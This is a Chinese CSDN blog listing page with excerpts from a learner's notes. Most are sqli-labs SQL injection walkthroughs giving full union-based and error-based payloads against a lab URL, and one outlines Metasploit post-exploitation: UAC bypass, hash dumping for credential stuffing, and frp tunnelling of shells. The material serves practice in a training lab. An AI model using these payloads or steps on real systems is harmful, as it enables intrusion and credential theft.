前进四-maoge-CSDN博客

原创 sqli labs代码审计1-10

sqli-labs第1-10关代码审计

2022-01-18 21:11:36 3011 1

原创 python自己装模块

https://pypi.org/ 下载对应模块然后打开python文件夹目录下的：Lib\site-packages把模块解压到这里

2021-09-15 21:58:17 87

第五关第一种：非常复杂，我也没太搞明白order by 3正常，order by 4异常’ union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a–+查数据库名union SELECT null,count(*),concat((select table_name from information_schema.table

2021-07-24 21:54:29 184

原创 sqli_labs第四关

第四关http://121.196.164.91:7001/Less-4/?id=-1%22)%20union%20select%201,2,concat_ws(%27~~%27,database(),user(),version())–+爆出数据库信息http://121.196.164.91:7001/Less-4/?id=-1%22)%20%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.ta

2021-07-24 14:55:49 102

原创 sqli_labs第3关

第三关和以前不同的是第三关用括号闭合，加个1’)就行了，其他一样http://121.196.164.91:7001/Less-3/?id=1%27)%20union%20select%201,2,3–+http://121.196.164.91:7001/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=

2021-07-24 14:38:30 111

原创 sqli-labs第1-2关

第一关字符型注入，加单引号报错，需要闭合来注入直接上语句：?id=-1’ union select 1,2,concat_ws(char(32,58,32),user(),database(),version()) --+concat_ws 可以无限查询，中间可以插入很多要查的东西，第一个是占位符，可以用~代替也行id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_

2021-07-24 13:22:21 138 2

原创 msf代理进内网

思路：拿到shell之后先获取最高权限，方法uac绕过提权然后获取hash，以后用于批量撞库啥的解决shell内乱码:chcp 65001（在cmd内输入，需要在旧版本的kali输入命令界面的编辑，首选项，编码里改成gbk，新版的没找到改编码的地方，有大佬知道的教教我吧）msf内网穿透进公网，cs传shell给msf1.msf内网穿透进公网，cs传给msf shelllinux： ./frpc -f *******85a82:1454793windows：frpc_windows_amd64

2021-07-12 21:09:26 1758

qq_42103643的博客